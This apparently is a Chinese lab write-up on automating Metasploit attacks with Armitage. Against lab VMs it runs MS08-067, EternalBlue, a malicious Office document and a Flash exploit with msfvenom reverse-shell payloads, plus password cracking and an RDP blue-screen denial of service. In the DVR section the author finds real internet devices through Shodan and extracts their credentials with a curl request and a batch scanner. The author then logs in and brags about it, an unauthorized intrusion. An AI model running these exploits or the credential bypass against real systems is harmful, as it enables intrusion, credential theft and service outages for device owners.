基於Armitage的MSF自動化集成攻擊實踐

基於Armitage的MSF自動化集成攻擊實踐

目錄

返回目錄php

0x01 實踐環境

  • macOS下Parallels Desktop虛擬機中(網絡源均設置爲共享網絡模式):
    • Kali Linux - 64bit(攻擊機,IP爲10.211.55.10
    • Windows 7 - 64bit(靶機,IP爲10.211.55.14
    • Windows XP Professional Version 2002 Service Pack 3(靶機,IP爲10.211.55.16

返回目錄html

0x02 預備知識

  • Armitage基本介紹:
    • Armitage是一款基於Java的Metasploit圖形界面化的攻擊軟件,能夠用它結合 Metasploit中已知的exploit來針對主機存在的漏洞自動化攻擊。經過命令行的方式使用Metasploit難度較高,須要記憶的命令過多,而Armitage完美的解決了這一問題,用戶只須要簡單的點擊菜單,就能夠實現對目標主機的安全測試和攻擊。Armitage良好的圖形展現界面,使得攻擊過程更加直觀,用戶體驗更好。因其操做的簡單性,尤爲適合Metasploit初學者對目標系統進行安全測試和攻擊。
  • Armitage攻擊目標主機的的通常方法:python

    • 目標網絡掃描:爲了肯定目標主機所在網絡結構的網絡拓撲,爲後續目標主機信息搜索和攻擊奠基基礎。
    • 目標主機信息蒐集:爲了收集目標主機的漏洞信息,根據收集到的漏洞信息能夠利用Armitage在Metasploit中自動搜索合適的攻擊模塊。
    • 目標主機攻擊模塊搜索:主要方法是依據發現的漏洞信息尋找能夠突破目標系統的現有漏洞利用模塊,爲具體的攻擊方案制定提供儘量多的可靠支撐。

返回目錄mysql

0x03 Armitage基礎配置

  • Armitage官網妹子鎮樓:
  • 打開Kali攻擊機,在終端中輸入/etc/init.d/postgresql start命令啓動postgresql服務:
  • 在msfconsole中輸入armitage命令啓動Armitage(在終端中直接輸入也能夠):

    也能夠經過菜單欄圖標直接打開Armitage! 對就是這個一臉壞笑的科技感十足的妹子233

    界面以下:

返回目錄linux

0x04 Nmap:Armitage下信息蒐集與漏洞掃描

  • 因爲本次實踐中靶機的IP已知,這裏能夠直接導入靶機的IP10.211.55.16,不過更通常的方法是根據已知信息推導出目標主機所在網段的IP,掃描目標網段完整信息,確認目標網絡拓撲結構以實施網絡偵查。在Armitage上方工具欄中依次選擇Hosts->Nmap Scan->Quick Scan(OS detect)

    填寫靶機所在網段10.211.55.0/24

    唔...這不就一樣給靶機掃出來了嗎!
  • 選中靶機10.211.55.16,右鍵選擇Services,查看靶機上開啓的服務:

    可見靶機的139端口開啓了netbios-ssn服務,445端口開啓了microsoft-ds服務~
  • 選中靶機10.211.55.16,右鍵選擇Scan,Armitage會調用Metasploit的漏洞掃描模塊,定向掃描靶機,尋找存在的漏洞,爲下一步肯定攻擊方法提供參考依據:

    可見相似前幾回實驗在Metasploit中手動配置主機號、端口號等設置如今通通直接自動化了!
  • 利用上一步中漏洞掃描獲得的漏洞信息,自動搜索Metasploit攻擊模塊庫,尋找合適的攻擊模塊。選中靶機10.211.55.16,依次選擇菜單欄Attacks->Find Attacks,Armitage會開始自動搜索尋找合適的攻擊模塊:
  • 搜索完成,Happy hunting^_^

返回目錄ios

0x05 Armitage下漏洞自動化攻擊實踐

5.1 ms08_067_netapi(CVE-2008-4250):Windows遠程溢出漏洞自動化攻擊

  • ms08_067漏洞介紹:nginx

    This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.git

    • ms08_067_netapi是一款Metasploit中有點老的溢出攻擊載荷,攻擊能夠得到一個相對高的權限。github

    • CVE ID:CVE-2008-4250算法

    • 原理:攻擊者利用受害者主機默認開放的SMB服務端口445,發送特殊RPC(Remote Procedure Call 遠程過程調用)請求,經過MSRPC over SMB通道調用Server程序中的NEtPathCanonicalize()函數時觸發,NetPathCanonicalize()函數在遠程訪問其餘主機時,會調用NetpwPathCanonicalize()函數,對遠程訪問的路徑進行規範化,而在NetpwPathCanonicalize()函數中發生了棧緩衝區內存錯誤,形成可被利用實施遠程代碼執行。

    • 危害:攻擊者能遠程主動發起對漏洞主機端口的掃描,而且能直接得到漏洞主機的系統權限,屬於最高嚴重級別的漏洞。

  • 在利用Armitage完成對靶機的攻擊模塊自動化搜索之後,選中10.211.55.16主機右鍵能夠發現多了Attack菜單。依次選擇Attack->smb->ms08_067_netapi菜單,選擇smb漏洞下的ms08_067漏洞對XP靶機進行攻擊(也能夠在Armitage左側樹型目錄下依次選擇exploit->windows->smb->ms08_067_netapi找到該漏洞):
  • 在彈出的攻擊配置對話框中配置LHOST/RHOST、LPORT/RPORT等信息(通常會自動配置好,這裏把LPORT改爲學號),Targets處配置靶機的系統(通常默認自動檢測靶機系統),勾選Use a reverse connection,點擊Launch開始攻擊:
  • Armitage會進行一系列自動化攻擊!攻擊完成後,能夠看到靶機的圖標會發生明顯變化:
  • Armitage會自動創建一個駐留在內存的shellcode即Meterpreter。在攻擊成功的靶機上右鍵選擇Meterpreter 1->Interact->Command Shell,輸入dir命令查看靶機C:\WINDOWS\system32目錄下的系統文件:

    攻擊完成(⁎⁍̴̛ᴗ⁍̴̛⁎):
  • 在攻擊成功的靶機上右鍵選擇Meterpreter 1->Interact->Meterpreter Shell,輸入getuid命令查看靶機當前用戶的權限是SYSTEM權限:

    攻擊完成(⁎⁍̴̛ᴗ⁍̴̛⁎):

返回目錄

5.2 ms14_064_ole_code_execution(CVE-2014-6352):IE遠程代碼執行漏洞自動化攻擊

  • ms14_064_ole_code_execution漏洞簡介:

    This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332. The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box due to the Powershell limitation. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.

    • CVE ID:CVE-2014-6352

    • 原理及危害:OLE(對象連接與嵌入)是一種容許應用程序共享數據和功能的技術。UAC(User Account Control,用戶賬戶控制)是微軟爲提升系統安全而在Windows Vista中引入的新技術。Microsoft Windows在OLE組件的實現上存在安全漏洞,未經身份驗證的遠程攻擊者可利用此漏洞執行遠程代碼。此漏洞源於沒有正確處理含有OLE對象的Office文件。

    • 受影響系統版本:
      • Microsoft Windows Vista
      • Microsoft Windows Server 2012
      • Microsoft Windows Server 2008
      • Microsoft Windows RT
      • Microsoft Windows 8.1
      • Microsoft Windows 8
      • Microsoft Windows 7
  • 在Armitage左側樹型目錄下依次選擇exploit->windows->browser->ms14\_064\_ole\_code\_execution找到該漏洞並雙擊打開配置界面開始配置。注意!此處須要把AllowPowershellPrompt置爲1!!而後配置好LHOST/RHOST、LPORT/RPORT等信息(把LPORT改爲學號,其他均取默認值),Targets處配置靶機的系統Windows XP,點擊Launch開始攻擊:
  • Armitage會進行一系列自動化攻擊!
  • 靶機打開IE瀏覽器,輸入meterpreter提供的URLhttp://10.211.55.10:8080/0KO2YrGZdZ1viW/SrEsdO/並回車,在靶機看來彷佛並無發生什麼!然而此時Armitage中靶機的圖標已發生明顯變化,代表Kali攻擊機已攻擊成功!!

  • 開始操做一波吧^_^在攻擊成功的靶機上右鍵選擇Meterpreter 1,發現除了上個攻擊實踐中查看Command ShellMeterpreter Shell功能以外,還具備查看瀏覽器文件、進程、截屏等功能!
    • 選擇Explore->Browse Files查看瀏覽器文件:
    • 選擇Explore->Show Processes查看靶機進程(這個比較有用啊emmm):
    • 選擇Explore->Screenshot進行截屏(據說你是截屏狂魔?):
    • 選擇Explore->Webcam shot調一波網絡攝像頭(顏控必備233):

      什麼?!居然沒裝攝像頭!欺騙我感情啊o(︶︿︶)o

返回目錄

5.3 ms17_010_eternalblue(CVE-2017-0143):「永恆之藍」自動化攻擊

  • ms17_010_eternalblue漏洞介紹:

    This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.

    • EternalBlue是2017年席捲全球的WannaCry勒索病毒的罪魁禍首,是微軟近些年來最爲嚴重的遠程代碼執行漏洞,能夠直接得到系統權限。百度上EternalBlue通常指去年爆發的WannaCry,其實是該勒索病毒軟件利用了NSA泄露的危險漏洞EternalBlue進行傳播。關於WannaCry詳見WannaCry - 百度百科以及我去年寫的博客應對WannaCry勒索危機之關閉445端口等危險端口——以本人Windows7系統爲例

    • CVE ID:CVE-2017-0143

    • 原理:
      • 利用Metasploit中近期更新的針對ms17-101漏洞的攻擊載荷進行攻擊獲取主機控制權限。
      • 利用windows系統的Windows SMB遠程執行代碼漏洞向Microsoft服務器消息塊(SMBv1)服務器發送經特殊設計的消息,能容許遠程代碼執行。
    • 主要用途:
      • Windows的SMBv一、SMBv2遠程溢出漏洞,對應MS17_010,主要針對445端口
    • 受影響系統版本:
      • 較廣,從WindowsXP到Windows server 2012
  • 在Armitage菜單欄依次選擇Hosts->Nmap Scan->Quick Scan(OS detect)並填寫靶機所在網段10.211.55.0/24搜索存活的主機:

    發現兩臺能夠攻擊的靶機,一臺XP(IP爲10.211.55.16)一臺win7(IP爲10.211.55.14):
  • 依次選擇菜單欄Attacks->Find Attacks,Armitage會開始自動搜索靶機尋找合適的攻擊模塊,對於win7右鍵依次選擇Attack->smb,能夠發現Armitage提供了5個可供攻擊的smb漏洞,選擇check exploits檢查這些漏洞是否能被攻擊:

    能夠看到除了第一個漏洞ipass_pipe_exec沒有檢測結果不知道可否進行攻擊以外其餘4個所有陣亡,要麼不可利用(not exploitable)要麼檢測不出來(not support check):


    並無找到所謂的eternalblue,怎麼破?
  • 彆着急,這裏咱們仍是在Armitage左側樹型目錄下依次選擇exploit->windows->smb->ms17_010_eternalblue找到傳說中的eternalblue永恆之藍並雙擊打開配置界面,相關配置均用默認值便可:

    特別注意的是,eternalblue是針對445端口進行攻擊的,攻擊成功與否關鍵在於靶機是否開放了這個端口!!!
  • 點擊Launch開始攻擊win7:


    攻擊不成功?!再來!
  • 從新雙擊打開eternalblue配置界面,勾選Use a reverse connection,點擊Launch開始攻擊:

    看看win7靶機的圖標,攻擊成功!!!

    查看session並進入,獲取shell:

    接下來該幹什麼,你懂的^_^Happy hunting^_^
  • 不過另外一臺靶機就沒那麼給面子了,可能因爲eternalblue只能攻擊Windows 7和Windows server 2008,攻擊xp時會顯示操做系統不匹配攻擊不成功(._.)

返回目錄

5.4 office_ms17_11882(CVE-2017-11882):Office遠程代碼執行漏洞自動化攻擊

  • Microsoft Office CVE-2017-11882漏洞介紹:

    Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.

    • 這是一個潛伏了17年之久的遠程代碼執行漏洞。該漏洞爲Office內存破壞漏洞,影響目前流行的全部Office版本。原理是利用了Office的一個EQNEDT32.EXE(公式編輯器)組件,攻擊者可以以當前登陸的用戶的身份執行任意命令。詳細請參照打開文檔變肉雞:潛伏17年的「噩夢公式」Office漏洞攻擊分析

    • CVE ID:CVE-2017-11882

    • 受影響系統版本:
      • Office 365
      • Microsoft Office 2000
      • Microsoft Office 2003
      • Microsoft Office 2007 Service Pack 3
      • Microsoft Office 2010 Service Pack 2
      • Microsoft Office 2013 Service Pack 1
      • Microsoft Office 2016
  • 在win7靶機上安裝Microsoft Office 2016:
  • 在Kali攻擊機中依次輸入如下命令生成doc測試文件:
    • 安裝啓動nginx:
      apt-get install nginx
      cd /usr/share/nginx/html/
      systemctl start nginx
    • 下載生成doc的python腳本:
      git clone https://github.com/Ridter/CVE-2017-11882.git
      cd CVE-2017-11882/
    • 生成測試文件cve.doc(靶機在打開該測試文件時同時會自動打開計算器程序calc.exe,以驗證Office CVE-2017-11882漏洞的存在):
      python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc
    • cve.doc放到網站根目錄:
      cp cve.doc /usr/share/nginx/html/
      ls /usr/share/nginx/html/
  • 用ncat向靶機發送cve.doc
    • win7靶機用命令行進入ncat目錄,打開監聽:
      ncat.exe -lv 5314 > cve.doc
    • Kali攻擊機創建鏈接並傳輸:
      ncat -nv 10.211.55.14 5314 < cve.doc
  • 靶機進入ncat目錄,打開cve.doc,成功彈出calc.exe計算器程序,測試成功:

  • 在Armitage左側樹型目錄下依次選擇exploit->windows->fileformat->office\_ms17\_11882找到該漏洞並雙擊打開配置界面開始配置,注意有兩處配置須要手動修改:
    • FILENAME+一欄填寫生成doc文件的名字cve2.doc
    • 設置URI路徑時要與上面生成doc時配置的路徑一致!
  • 點擊Launch開始自動化攻擊流程:
  • 注意這條提示信息!它指明瞭剛剛MSF生成的cve2.doc所在路徑!

    而後咱們進入該目錄並用ncat把cve2.doc傳到靶機上:
  • win7靶機進入ncat目錄,打開cve2.doc,觸發訪問10.211.55.10:8080/5314就會獲得反彈到5314端口的TCP會話:


    因而可憐的靶機又被我攻陷了哈哈哈哈哈!!

    來抓個屏笑一個?^_^

返回目錄

5.5 CVE-2018-4878:Adobe Flash 0day漏洞自動化攻擊

  • Adobe Flash CVE-2018-4878漏洞介紹:

    2018年2月1日,Adobe官方發佈了Adobe Flash Player系列產品的安全通告(APSA18-01),一個最新的Adobe Flash 0day漏洞被發現針對韓國地區的人員發起攻擊,該0day漏洞編號爲CVE-2018-4878,目前最新版本28.0.0.137及其之前版本的Adobe Flash Player均受漏洞影響。直到2月5日,Adboe才發佈補丁來修復此0day漏洞。

    攻擊者經過構造特殊的Flash連接,並將惡意Flash連接嵌入Office文檔、網頁或者桌面應用,當用戶用瀏覽器/郵件/Office訪問此Flash連接時,會被「遠程代碼執行」,而且直接被getshell。

    • 受影響系統版本:

      產品 版本 平臺
      Adobe Flash Player桌面運行時 28.0.0.137和更早版本 Windows,Macintosh
      適用於Google Chrome的Adobe Flash Player 28.0.0.137和更早版本 Windows,Macintosh,Linux和Chrome操做系統
      適用於Microsoft Edge和Internet Explorer 11的Adobe Flash Player 28.0.0.137和更早版本 Windows 10和8.1
      Adobe Flash Player桌面運行時 28.0.0.137和更早版本 Linux

因爲Armitage中並未自帶此漏洞的攻擊模塊,咱們須要本身配置攻擊環境!

  • 下載並解壓CVE-2018-4878-master.zip,輸入命令:

    unzip CVE-2018-4878-master.zip

  • 用msfvenom生成shellcode,注意IP地址應爲Kali的IP,輸入命令:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=5314 -f python > code.txt

  • 查看代碼文件,輸入命令:

    cat code.txt

  • 進入CVE-2018-4878-master.zip的解壓目錄,編輯cve-2018-4878.py文件,輸入命令:

    vim cve-2018-4878.py


    將下面紅色標出的部分用剛纔生成的shellcode替換:

    而後修改swf文件和html文件路徑爲本身的路徑並保存退出:

  • 用python執行腳本文件生成exploit.swfexploit.html,輸入命令:

    python cve-2018-4878-master.py

  • 啓動Apache服務,輸入命令:

    service apache2 start

    能夠用netstat命令查看Apache服務是否開啓:

    service apache2 status

  • Apache服務成功開啓後,將以前生成的cp exploit.swfexploit.html複製到apache2服務的網頁目錄下,輸入命令:

    cp exploit.swf /var/www/html/exploit.swf
    cp exploit.html /var/www/html/exploit.html


    至此,攻擊環境基本配置完成,如今只要受害者訪問咱們的連接就能夠直接被遠程控制!

下面開始用Armitage操做一波!看仔細咯~

  • 老規矩,啓動Armitage定向掃描,先將我們的win7靶機給掃出來:


    須要注意的是Armitage界面下方的Console能夠直接輸入metasploit的相關命令!
  • 使用handler監聽模塊,輸入命令:

    use exploit/multi/handler
  • 將攻擊載荷設置爲咱們在生成文件的時候所選擇的攻擊載荷(此處爲反彈TCP鏈接),輸入命令:

    set payload windows/meterpreter/reverse_tcp
  • 設置Kali攻擊機的IP和監聽端口(咱們在用msfvenom生成shellcode時設置的端口),輸入命令:

    set LHOST 10.211.55.10
    set LPORT 5314
  • 攻擊配置完成,開啓監聽,輸入命令:

    exploit


    萬事俱備,就等靶機一個反彈鏈接騷操做啦>_<

  • win7靶機下載安裝Adobeflash 28.0:

    選擇不檢查更新:
  • 用IE訪問http://10.211.55.10:8088/exploit.html
  • OK攻擊成功!此時咱們能夠看到Kali攻擊機已經獲取到sessions:
  • 接下來又到了得到shell的時間!先查看一波系統配置吧>_<

    其實在Armitage裏得到shell以後的操做並無直接在MSF命令行裏那麼舒服,下面展現一波我用msfconsole又作了一遍的結果:
  • 玩點啥呢...截個屏唄?
  • 查看一波系統進程!
  • 來玩玩沒玩過的!試試這個什麼ARP掃描>_<

    默認設置,直接開幹>_<

    唔...好像確實挺牛逼的,能把ARP緩存表給掃出來,連我用的是PD都知道0.0
  • 這是...遠程桌面控制嗎?!

    然鵝很遺憾個人win7靶機並沒裝VNC viewer...因此此次就算了吧>_<暫時放過你233

返回目錄

5.6 CVE-2018-9995:DVR登陸繞過漏洞攻擊

  • CVE-2018-9995漏洞介紹:

    2018年5月1日,一名阿根廷安全研究人員Ezequiel Fernandez發佈了一款功能強大的新型黑客工具,能夠輕鬆地提取各類數字視頻錄像機(DVR)品牌的明文憑證,並授予攻擊者訪問這些系統的權限,本質上來講就是容許用戶隨意查看DVR錄製的視頻記錄。

    該工具名爲「getDVR_Credentials」,是CVE-2018-9995的概念驗證(proof-of-concept,簡稱PoC),而CVE-2018-9995是Fernandez於上月初發現的一個安全漏洞。

  • 使用shodan獲取有可能存在漏洞的設備,搜索關鍵字GNU rsp/1.0(還可使用zoomeye,fofa,google等搜索引擎搜索設備,這裏我就未作其餘嘗試了):
  • 使用curl命令獲取該MDVR設備的登陸密碼(條件是存在device.rsp頁面並可訪問),這簡直是一條萬能的命令啊:

    curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

    嘻嘻,list出來兩組用戶名和密碼!!!還等什麼趕忙試試!!
  • 輸入任一組用戶名和密碼以後就能登陸DVR設備了>_ <能夠說很是易行且致命> _ <因爲某些緣由這裏就再也不上圖啦> _<

  • 開心之餘,咱們能夠思考一下可否將這種入侵手段作成MSF的一個攻擊模塊而後利用我們的Armitage實施自動化攻擊呢?實際上這位阿根廷大佬已經寫好了一個py工具發佈在他的github上!咱們能夠直接拿來用233>_<
  • Kali攻擊機打開終端,依次輸入如下命令進行安裝配置:

    git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
    cd CVE-2018-9995_dvr_credentials
    pip install -r requirements.txt

  • 一切準備就緒,開始攻擊!!!輸入如下命令:

    python getDVR_Credentials.py --host HOST --p PORT

    --p PORT不指出也行喔!

    emmmm成功啦,能夠看出這臺XVR設備存在弱口令漏洞,密碼居然爲空666666再黑進一波,溜了~

DVR系列設備漏洞批量檢測

  • Kali攻擊機終端中輸入命令vim CVE-2018-9995_check.py新建CVE-2018-9995_check.py
  • 這裏咱們直接拿來hzkey大佬的腳本,該腳本用來批量檢測咱們輸入送檢的DVR系列設備是否存在login.rsp頁面,輸入如下代碼而後保存並退出:

    import tableprint as tp
      import sys
      import requests
      import re
    
      class Colors:
          GREEN = '\033[32m'
          RED = '\033[0;31m'
          BLUE = '\033[*]'
          ORANGE = '\033[33m'
    
      def check_host(host):
          try:
              print(Colors.ORANGE+"Checking : %s"%host)
              url = 'http://' + host+'/login.rsp'
              rr= requests.get(url,timeout=30,allow_redirects=False)
              if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]):
                  print(Colors.GREEN+"[*] CVE-2018-9995 Detection :Url is %s"%url)
                  ff=open('result.txt','a+')
                  ff.write('%s\n'%(url))
          except:
              pass
      if __name__ == '__main__':
          if len(sys.argv) < 2:
              print(Colors.BLUE+"""Usage: Python3 CVE-2018-9995.py host.txt
      host.txt:127.0.0.1:8080 or www.baidu.com
      """)
          if len(sys.argv) >= 2:
              file = open(sys.argv[1])
              for i in file:
                  i = i.strip()
                  check_host(i)
              file.close()
  • 用命令vim host.txt新建host.txt,內容能夠爲shodan等搜索引擎上搜到的設備的IP:PORT(能夠不寫端口)或者域名的形式;
  • 輸入如下命令:

    python CVE-2018-9995_check.py host.txt

    腳本運行後對使用了DVR系列攝像頭的host會保存到result.txt文件裏:

    嘖嘖嘖shodan第一頁上10臺DVR系列的設備居然有9臺存在漏洞!抱歉咱們Hacker就是能夠隨心所欲!!!

返回目錄

0x06 Armitage下Auxiliary輔助模塊應用

6.0 Metasploit Auxiliary輔助模塊概述

Metasploit的輔助模塊主要用於信息蒐集階段,功能包括掃描、口令猜解、敏感信息嗅探、FUZZ測試發掘漏洞、實施網絡協議欺騙等。這些模塊能夠分爲Admin、Scanner、Server三個大類。

根據本學期《網絡對抗技術》和《網絡安全協議》課程所學知識,咱們能夠按照不一樣協議和服務對應的端口來對輔助模塊進行功能性劃分:

端口 協議或服務 模塊名 路徑 功能
信息收集 psnuffle auxiliary/sniffer/psnuffle 嗅探抓包
dir_scanner auxiliary/scanner/http/dir_scanner 掃描網站目錄
search_email_collector auxiliary/gather/search_email_collector 搜索網站中的E-mail
服務掃描及利用 syn auxiliary/scanner/portscan/syn SYN端口掃描
tcp auxiliary/scanner/portscan/tcp TCP端口掃描
xmas auxiliary/scanner/portscan/xmas TCP "XMas"端口掃描
ack auxiliary/scanner/portscan/ack ACK防火牆掃描
arp_sweep auxiliary/scanner/discovery/arp_sweep 探測網段中存活主機
21 FTP ftp_version auxiliary/scanner/ftp/ftp_version FTP主機掃描
anonymos auxiliary/scanner/ftp/anonymos FTP匿名登陸
22 SSH ssh_version auxiliary/scanner/ssh/ssh_version SSH服務掃描
ssh_login auxiliary/scanner/ssh/ssh_login SSH口令猜想
23 Telnet telnet_version auxiliary/scanner/telnet/telnet_version Telnet服務掃描
telnet_login auxiliary/scanner/telnet/telnet_login Telnet口令猜想
25 SMTP smtp_version auxiliary/scanner/smtp/smtp_version SMTP版本掃描
smtp_enum auxiliary/scanner/smtp/smtp_enum SMTP枚舉
69 TFTP tftpbrute auxiliary/scanner/tftp/tftpbrute FTP文件掃描
anonymous auxiliary/scanner/ftp/anonymous FTP匿名登陸
13九、445 SMB smb_version auxiliary/scanner/smb/smb_version 掃描操做系統版本
smb_lookupsid auxiliary/scanner/smb/smb_lookupsid 掃描組的用戶
smb_login auxiliary/scanner/smb/smb_login 用於登陸
smb_enumusers auxiliary/scanner/smb/smb_enumusers 枚舉系統上的用戶
161 SNMP snmp_enum auxiliary/scanner/snmp/snmp_enum 批量檢測SNMP
snmp_login auxiliary/scanner/snmp/snmp_login 掃描SNMP主機
1521 oracle tnslsnr_version auxiliary/scanner/oracle/tnslsnr_version oracle服務掃描
1433 mssql mssql_ping auxiliary/scanner/mssql/mssql_ping 掃描開放mssql主機
3306 mysql mysql_login auxiliary/scanner/mysql/mysql_login mysql口令猜想
5432 postgres postgres_login auxiliary/scanner/postgres/postgres_login postgres口令猜想
8080 tomcat tomcat_mgr_login auxiliary/scanner/http/tomcat_mgr_login tomcat口令猜想

返回目錄

6.1 John the Ripper:Linux口令破解模塊攻擊實踐

  • jtr_linux密碼破解模塊簡介:

    This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower.

    • 用途:最流行的口令破解器,用於破解弱口令Hash(默認只破解MD5和DES,將Crypt選項置爲true也可以慢速破解Blowfish和SHA)
  • John the Ripper簡介:

    The John The Ripper module is used to identify weak passwords that have been acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal of this module is to find trivial passwords in a short amount of time. To crack complex passwords or use large wordlists, John the Ripper should be used outside of Metasploit. This initial version just handles LM/NTLM credentials from hashdump and uses the standard wordlist and rules.

    • JTR官網:John the Ripper - Metasploit Unleashed
    • 原理:JTR(以及任何離線密碼破解器)的工做方式是計算列表(或所生成的)單詞的Hash,並將它們與須要被破解的Hash對比,當存在匹配時它就假設密碼找到了。
  • 首先咱們須要以特定格式設置用戶名和密碼Hash(這裏選擇用MD5在線生成):
    • 訪問MD5在線加解密網站CMD5,在上方【密文】處輸入一段字符串,下方【查詢結果】處就當即顯示出結果(只要不超過31位,不然會卡住233):
    • 分別將不一樣用戶名對應的密碼通過MD5在線加密以後獲得Hash值,得到下面這張表:

      用戶名 密碼 Hash
      admin admin 21232f297a57a5a743894a0e4a801fc3
      user user ee11cbb19052e40b07aac0ca060c23ee
      Tom password 5f4dcc3b5aa765d61d8327deb882cf99
      jtr_linux abc123 e99a18c428cb38d5f260853678922e03
      20155314 qwertyu123. 682e9cfe26d949a10009cfc9969076ad
      kxjsjc@163.com kxjsjc_wx_1553 d80b3f4f2517d9a3ecf2a1e8031f6ff1
  • 在Kali攻擊機中新建一個名爲hashes.txt的文本文件,把表中信息添加進去,每行包含一個用戶名和一個Hash,以:分隔(username:hash):
  • 在Armitage左側樹型目錄下依次選擇auxiliary->analyze->jtr_linux並雙擊打開開始配置,配置好JOHN_PATH而後點Launch
  • show options命令還能夠查看模塊的有效選項及其詳細描述:
  • Armitage會爲咱們生成一個單詞列表文件WordList,可是不知道什麼緣由它並無識別出個人hashes.txt而報錯:(
  • 此時咱們手動使用剛剛Armitage生成的單詞列表進行破解,打開終端並執行如下命令:
    john --wordlist=/tmp/jtrtmp20180502-5917-ctqwpk --format=raw-md5 hashes.txt

    能夠看到單詞列表中6個口令破解了4個。咱們還能看出,John每秒能嘗試10,013,000次(10,013KC/s)!!!
  • 至於剩下的兩個,多是我把密碼設置得太複雜的緣由吧一直沒破解出來(ー ー;)將--wordlist選項去掉採用暴力破解的方式也一直沒跑出來(ー ー;)時間緣由跑了不到10分鐘就被我掐掉了感受速度仍是比彩虹表要慢不少啊(ー ー;)

返回目錄

6.2 ms12_020_maxchannelids(CVE-2012-0152):Windows遠程桌面釋放重引用拒絕服務模塊之死亡藍屏攻擊實踐

  • MS12-020 Microsoft Remote Desktop Use-After-Free Denial of Service模塊簡介:

    This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.

  • UAF(Use-After-Free)釋放重引用漏洞簡介:

    Use-After-Free是一種內存破壞漏洞,成因是一塊堆內存被釋放了以後又被使用(指針存在)。這個引用的結果是不可預測的。

    舉例:假設一個對象A前4字節(0x400000)爲函數printf,釋放後,惡意用戶重用這個空間,將前4字節改成(0x4a0000)system函數,而後來到漏洞的觸發點,程序因爲疏忽再次調用A的printf,卻調用了system函數。

  • MS12-020漏洞簡介:
    • MS12-020全稱Microsoft Windows遠程桌面協議RDP遠程代碼執行漏洞。

    • CVE ID:CVE-2012-0152

    • 原理:使用了CVE-2012-0152遠程桌面協議RDP拒絕訪問漏洞。遠程桌面協議(RDP, Remote Desktop Protocol)是一個多通道(multi-channel)的協議,讓用戶(客戶端或稱「本地電腦」)連上提供微軟終端機服務的電腦(服務器端或稱「遠程電腦」)。Windows在處理某些對象時存在錯誤,可經過特製的RDP報文訪問未初始化的或已經刪除的對象,致使任意代碼執行,而後控制系統。

    • 危害:若存在該漏洞,其最嚴重的狀況可能會形成被攻擊系統被遠程執行任意代碼,而一般狀況下會形成對方藍屏或重啓。

    • 受影響系統版本(開了RDP的):
      • Microsoft Windows XP Professional
      • Microsoft Windows XP Home
      • Microsoft Windows Server 2003 Standard Edition
      • Microsoft Windows Server 2003 Enterprise Edition
      • Microsoft Windows Server 2003 Datacenter Edition
      • Microsoft Windows 7
  • 爲了達到咱們的實踐效果,咱們須要在win7靶機上開啓遠程桌面協議,步驟以下:
    • 在【計算機】上右鍵屬性打開屬性菜單,容許遠程桌面鏈接:
    • 在【控制面板】中打開【網絡和共享中心】,更改【高級共享設置】:

      啓用公用文件夾共享:
    • 按下快捷鍵windows + R打開運行,輸入services.msc打開計算機服務管理,啓動遠程桌面服務(默認是禁止的):
    • 修改防火牆設置,增長一條容許鏈接tcp 3389端口的入站記錄,或者乾脆直接關閉防火牆!
    • 在cmd中輸入命令netstat -a查看端口開放狀況,能夠看到此時3389端口已經開放:
  • Kali攻擊機打開Armitage,在上方工具欄中依次選擇Hosts->Nmap Scan->Quick Scan(OS detect),填寫靶機所在網段10.211.55.0/24,而後選中靶機10.211.55.14,右鍵選擇Services,查看靶機上開啓的服務:

    可見靶機已經開啓了3389遠程服務,那麼接下來咱們利用Armitage中MS12-020這個RDP拒絕訪問漏洞輔助模塊來進行攻擊!

  • 在Armitage左側樹型目錄下依次選擇auxiliary->dos->windows>rdp>ms12_020_maxchannelids(也可直接在下方搜索欄輸入關鍵字搜索,更快)並雙擊打開配置,發現RHOST和RPORT已經被默認設置爲靶機的配置,咱們直接點擊Launch便可進行攻擊:

  • Armitage這邊顯示靶機的RDP協議seems down,一看靶機那邊瞬間藍屏( ̀⌄ ́)哦喲攻擊成功!!!

    咱們的口號是——藍屏的*,好喝的*!(廣告莫名植入)

    同時,咱們能夠從藍屏信息中看出此次藍屏是因爲RPDWD.SYS引發的內存地址異常(0x00000050),有分析稱出現漏洞的罪魁禍首是該文件中的HandleAttachUserReq()函數。

